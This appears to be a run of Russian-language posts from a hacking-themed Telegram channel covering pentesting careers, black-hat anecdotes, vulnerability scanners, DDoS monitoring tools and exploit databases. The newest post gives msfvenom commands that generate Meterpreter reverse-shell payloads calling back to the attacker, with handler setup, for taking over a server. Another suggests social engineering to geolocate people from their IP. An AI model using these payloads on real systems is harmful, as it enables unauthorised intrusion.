Hacked by Python

2021-07-10 12:00:43 ​​ Всем Асап, Это Питон. Сегодня я расскажу вам как получить удаленный доступ к компьютеру или серверу если у вас есть такая возможность. Для этой цели мы будем использовать Metasploit.

В этот раз, мы не будем говорить о случае, когда у сайта на серваке стоит программное обеспечение старой версии. Разберем вариант, когда вам удалось загрузить туда reverse shelll или же попросту обратную оболочку.

На этом этапе, найдутся знающие люди которые спросят меня, мол зачем тут Metasploit. Ведь мы можем просто открыть нужный порт прописав что-то вроде: nc -lvp ваш порт.

Вот причины по которым выгодно делать это через Metasploit.
1)Обратная оболочка в Metasploit более надежная. И не так быстро разрывается если что-то случится.
2) Вы можете заспавнить оболочку в meterpreter просто написав shell.
3)Вы можете иметь неограниченное количество сессий и свободно переключаться между ними.

Итак перейдем в делу. Есть несколько вариантов использования Metasploit.

Если атакуемый сервер это Windows - то вот ваша полезная нагрузка:
🗨 msfvenom -p windows/x64/meterpreterreversetcp lhost=Ваш ip lport=Ваш порт -f aspx -o shell.aspx

При этом название используемого эксплойта будет:🗨 use exploit/multi/handler
* Using configured payload generic/shellreversetcp
msf5 exploit(multi/handler) >
🗨 set payload windows/x64/meterpreterreversetcp

Если аттакуемый сервер это Linux - то ваша полезная нагрузка:
🗨 msfvenom -p linux/x86/meterpreter/reversetcp LHOST=[Ваш ip] LPORT=[Ваш порт] -f elf > shell.elf
Это payload внутри опций в настройках.
🗨set payload linux/x86/meterpreter/reversetcp

В общем надеюсь кто шарит смог что-то показать. Кто не шарит, сделаю скоро более вводный гайд по оболочкам и подключению к ним. Всем удачи Открыть/Комментировать

2021-07-03 18:08:11 ​​#OPEN_VAS
#СКАННЕРЫ


Всем Асап, Это Питон. Меня не было некоторое время, но заявляю, я пропадал по важным причинам. Сегодня, мы поговорим про сканнеры, которые предоставляют возможность пользователю, посмотреть уязвимые сегменты сети и предпринять каике то действия в связи с этим.

Всем нам в голову приходит nmap если мы говорим про сканнеры. И даже у него есть возможность посмотреть уязвимости.

Однако сегодня возьмем в качестве примера OpenVas. Это условно-бесплатное программное обеспечение которое мы с вами сейчас установим.

Установка:
🗨apt install docker.io

🗨docker run -d -p 443:443 --name openvas mikesplain/openvas

Эта команда одновременно вытащит контейнер docker, а затем запустит контейнер. Для полной настройки и запуска контейнера может потребоваться несколько минут. Как только он будет завершен, вы сможете перейти к https://127.0.0.1 в вашем предпочтительном браузере и OpenVAS будет настроен и готов к работе!

После того как все будет готово - вашими данными для входа на локал хост будут admin:admin. Вы сможете нажать Task Wizzard чтобы более предметно ознакомится с приложением. Открыть/Комментировать

2021-06-19 12:00:38 ​​Всем Асап, это Питон. Сегодня у нас немного не хакерская тема. А скорее наоборот. Мы разучим пару приемов для того чтоб-бы отразить DDos атаку. Для этого нам потребуется установить пару утилит.

Давайте начнем. И напишем сразу:
🗨sudo apt-get update nload
🗨sudo apt-get update iftop
🗨sudo apt-get update htop

1. Iftop - небольшая утилита, котора дает вам возможность видеть все активные подлкючения к вашему серверу. После чего, вы легко сможете забанить недоброжелателя.

2. htop - компьютерная программа, предназначенная для вывода на терминал списка запущенных процессов и информации о них. Таким образом можете смотреть нагрузку на разные элементы сервера.

3. nload - консольное приложение, которое отслеживает сетевой трафик в режиме реального времени и выводит данные загрузки канала в виде псевдографики раздельно по входящему и исходящему трафику.

По итогу можно сказать что это крайне полезные утилиты. Они реально Вам пригодятся, и помогут спасти Ваш сервак если, что-то случится. Но помните, что ничего Вас не спасет кроме ваших Рук. Открыть/Комментировать

2021-06-14 13:00:26 ​​#КАК_СТАТЬ_ХАКЕРОМ

Всем Асап это Питон. Сегодня расскажу вам про то, как углубиться в информационную безопасность.

К сожалению, этот процесс не похож на изучене языка или же подготовки к экзамену. Погружение в ИБ на серьезном уровене это всегда крайне сложно. Это обусловлено тем, что порог вхождения крайне высок.

Например, чтобы иметь познания в области web hacking'а (то чем я занимаюсь больше всего)
Надо знать следующие вещи:

1)Основы телекоммуникациий и работы сети.
2)Работа в linux.
3)Работа в Kali Linux.
4) Изучение большого количества программного обеспечения.
5)Понимать что делает тот или иной скрипт который вы будете использовать.
6)Знать больше 10 видов самых популярных уязвимостей и как их эксплотировать.

Входной порог сложный, однако нет ничего невозможного. И если долго работать над этим направлением то все получится.
Так же, не забывайте, что в ио кинет есть масса платформ, которые готовы обучить Вас этому. Открыть/Комментировать

2021-06-10 13:13:16 #ВСЕ_ПРО_IP

Всем Асап, это Питон. Сегодня расскажу Вам что можно сделать узнав чужой ip. Так как Nmap появился давным давно, каждый кто владеет этим инструментом имеет возможность прочекать чужой ip.

IP-адрес (от англ. Internet Protocol) — уникальный числовой идентификатор устройства в компьютерной сети, работающий по протоколу TCP/IP.

Итак давайте поговорим про то, что возможно сделать зная чужой адрес:
1. Вы можете сделать энумирацию разных портов и посмотреть, что открыто, для возможного дальнейшего проникновения внутрь.
2. Вы можете использовать готовый эксплойт в случае если это уязвимый сайт работающий на популярном back-end языке. Например php версии ниже 5.4.
3. Если Вы имеете дело с человеком то есть шанс использовать социальную инженерию и получить его геолокацию вместе с координатами. Открыть/Комментировать

2021-06-05 11:00:19 ​​#BLAK_HAT_HACKING

Всем Асап, это Питон. Сегодня мы поговорим про темных хакеров. Да, именно тех ребятах которые крадут бабки со счетов, взламывают сервера и сайты да и вообще творят гадости.

Black hat hacker или же просто темный хакер - это человек который, совершает на регулярной основе ряд киберпреступлений ну или же уже совершил и сидит в тюрьме.

Зачастую такими людьми движет самый простой мотив - это заработок денег таким грязным способом. Разумеется, так бывает далеко не всегда да и кто я такой чтобы судить человека за такие действия. Ведь очень часто людям приходится рисковать и идти на такие риски совсем в крайних случаях.

Будучи достаточно опытным, я имел возможность украсть деньги со счетов PayPal несколько раз. Да и других кошельков тоже, однако никогда не видел разницу между тем как воровать деньги в метро или интернете. Поэтому разумеется отказался в силу каких-то моральных качеств.

Однако в этой сфере есть гениальные люди, чья деятельность меня восхищает и побуждает к изучению аспектов Пентеста и Bug bounty.

Я имел опыт общения с человеком который продавал вирус для поражения им компьютерной сети банковской системы. Готов поспорить, что он уже сидит. Кстати про отсидку - в этой сфере если ты взломал что-то серьезное или реально перешел кому-то дорогу то твоя поимка всегда вопрос времени. Никакая анонимизация тебя не спасет. Как бы я не любил ребят из отдела К МВД, к сожалению у них есть возможность взламывать прокси сервера для анонимизации да и сервера TOR тоже. Поэтому никому не советую заниматься этим. Открыть/Комментировать

2021-06-01 11:00:13 ​​#WHITE_HACKING


Всем Асап, Это Питон. Сегодня я постараюсь максимально эффективным способом рассказать Вам о том, как "Хакер" может легально зарабатывать деньги при этом не нанося никому ущерб.

В наше время, само слово Хакер приобрело достаточно темный оттенок. Хотя это слово не всегда означает, что человек наносит людям вред. Как вы возможно знаете, Хакеры есть темные и белые. Ну иногда еще и серые. Чем занимаются темные и серые хакеры мы поговорим в другом посте. А сегодня разберем деятельность белых хакеров.

1)Белый хакинг зачастую является сферой информационной безопасности. Это очень и очень серьезная профессия которая требуют высшего образования. Специалист по информационной безопасности занимается ее обеспечением в своей компании или в в других если это аутсорсинг.

2)Bug Bounty это вид белого хакинга, когда специалист в области it так или иначе находит в какой-то системе какие-то баги и сообщает об этом ее владельцу. При этом не совершая никаких правонарушений. Я сам такое проворачивал и не раз, и скажу вам, что в странах СНГ таким лучше не заниматься. Мой опыт говорит, что наши люди слишком недоверчивы и всегда ищут подвох. Поэтому даже из-за обычной помощи могут обратиться в органы. В интернете есть огромное количество ресурсов где вы можете сообщать компаниям об их уязвимостях если таковые нашлись и получить награду. Это дело крайне высоко оплачивается. Однако и уязвимость у большой компании вы вряд ли найдёте.

3)Пентестинг. Это просто метод испытания на проникновение в какую-либо систему. Зачастую таких людей нанимают в западных странах для того, чтобы их компанию не взломали сами хакеры. В общем настоящие белые рыцари пусть и с темной стороной. Открыть/Комментировать

2021-05-29 11:00:33 #ВЗЛОМ_БЕЗ_ЗАНИЯ_ПРОГРАМИРОВАНИЯ

Всем Асап, Это Питон. Сегодня расскажу вам как можно взломать что-либо не зная языков программирования. На самом деле эта тема очень интересная. Меня часто спрашивают разве это не связанные понятия между собой?

Взлом чего-то это очень часто манипуляция с данными на каком-то языке, однако если вы понимаете общую структуру иерархии этих данных то вам может быть намного проще.

Привожу пример. Представим что мы используем XXE уязвимость. Я знаю, что вы скорее всего про нее знаете, поэтому сейчас объясню что это. Если в вкратце и простым языком, то это ошибка в следствие которой, можно вытянуть или даже получить удаленный доступ, или RCE с помощью неправильной фильтрации языка разметки (xml) на сервере.

Лично я никогда этот xml не учил. По секрету скажу, для меня программирование - это вообще нечто скучное и неинтересное. Однако если я знаю как взаимодействовать с этой ошибкой я могу использовать определенный готовый код, если у меня есть инфа что он делает.

На GitHub'е есть полезные нагрузки для всех уязвимостей. Это очень облегчает работу с "кодом". Если вы ленивый но хитрый вы можете не учить язык программирования а просто взять какой-то готовый вариант. Но самое главное не делать ничего плохого. Ибо помните, что если наделаете делов то вас найдут.

Вот ссылка на раздел - https://github.com/swisskyrepo/PayloadsAllTheThings/ Открыть/Комментировать

2021-05-24 15:55:30 ​​#УЯЗВИМОСТИ_И_ЭКСПЛОЙТЫ

Всем Асап, это Питон. И вот мы уже встречаемся с Вами на обновленном канале. Теперь он полностью будет посвящен темам кибер безопасности и хакингу.

Сегодня отойдем от темы взлома веб сайтов и поговорим про уязвимости и их оценку.

Каждая уязвимость оценивается по шкале от 1 до 10. Очевидно чем выше тем серьезнее могут быть последствия ее применения. Эти критерии не учитывают стоимость информации и ее всевозможные виды. Тут речь идёт о сугубо технических характеристиках.

Откуда появляются уязвимости? Рано или поздно программное и аппаратное обеспечение начинает устаревать и как следствие большое количество "прошаренных" в IT людей могут придумать всевозможные способы его взлома.

В большинстве случаев если дело касается эксплойтов то вы сможете использовать metasploit framework для того, того чтобы их использовать. Однако иногда приходится лезть в другие источники, качать эксплойт оттуда и запускать в ручную. С этим может помочь этот сайт.
Данный ресурс - самая знаменитая библиотека эксплойтов в интернете. Рекомендую ознакомиться. https://www.exploit-db.com/ Открыть/Комментировать

2021-05-22 12:53:38 Друзья, наконец-то это свершилось! Мы сделали полный ребрендинг нашего канала. Поскольку в последние месяцы мы рассказываем вам о хакинге и кибербезопаности больше, чем просто об IT, было решено сменить дизайн и название на более подходящее.

Теперь наш канал называется Hacked by Python. Питон - это само собой не язык программирования, а наш главный админ и контент-мейкер, ответственный за 99% постов на данном канале.

ВНИМАНИЕ
Канал мы никому не продавали и не собираемся. Его не украли и ничего в таком роде. Это все ещё мы и мы будем продолжать делать тот
контент, который делали до этого. Разве, что будем тестить новые форматы и рубрики.

Напоследок, хотелось бы сказать спасибо всем вам, то есть нашим подписчикам. Наш канал существует, уже почти год и без вас у нас бы ничего не получилось. Спасибо большое всем, кто читает посты и поддерживает! Надеемся вам понравится новый стиль канала) Открыть/Комментировать